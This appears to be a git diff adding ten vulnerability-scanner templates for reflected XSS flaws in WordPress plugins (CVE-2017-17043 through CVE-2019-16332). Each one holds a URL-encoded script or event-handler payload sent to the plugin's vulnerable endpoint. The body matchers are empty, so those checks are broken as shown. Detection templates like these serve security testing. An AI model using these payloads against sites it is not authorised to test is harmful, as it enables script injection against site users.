diff --git a/CVE-2017-17043.yaml b/CVE-2017-17043.yaml new file mode 100644 index 0000000..3d321b4 --- /dev/null +++ b/CVE-2017-17043.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-17043 + +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2017-17059.yaml b/CVE-2017-17059.yaml new file mode 100644 index 0000000..ecf71fa --- /dev/null +++ b/CVE-2017-17059.yaml @@ -0,0 +1,34 @@ +id: CVE-2017-17059 + +info: + name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php. + reference: | + - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1" + + body: "amty_hidden=1" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2017-17451.yaml b/CVE-2017-17451.yaml new file mode 100644 index 0000000..40a4e59 --- /dev/null +++ b/CVE-2017-17451.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-17451 + +info: + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2017-18536.yaml b/CVE-2017-18536.yaml new file mode 100644 index 0000000..5ac65f8 --- /dev/null +++ b/CVE-2017-18536.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-18536 + +info: + name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. + reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2017-9288.yaml b/CVE-2017-9288.yaml new file mode 100644 index 0000000..19bdc03 --- /dev/null +++ b/CVE-2017-9288.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-9288 + +info: + name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2018-11709.yaml b/CVE-2018-11709.yaml new file mode 100644 index 0000000..4f305a6 --- /dev/null +++ b/CVE-2018-11709.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-11709 + +info: + name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2018-20462.yaml b/CVE-2018-20462.yaml new file mode 100644 index 0000000..79a0cbd --- /dev/null +++ b/CVE-2018-20462.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-20462 + +info: + name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2018-5316.yaml b/CVE-2018-5316.yaml new file mode 100644 index 0000000..7553a25 --- /dev/null +++ b/CVE-2018-5316.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-5316 + +info: + name: SagePay Server Gateway for WooCommerce <= 1.0.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 + tags: cve,cve2018,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2019-15713.yaml b/CVE-2019-15713.yaml new file mode 100644 index 0000000..55c9e48 --- /dev/null +++ b/CVE-2019-15713.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-15713 + +info: + name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: | + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2019-16332.yaml b/CVE-2019-16332.yaml new file mode 100644 index 0000000..f067dd1 --- /dev/null +++ b/CVE-2019-16332.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-16332 + +info: + name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200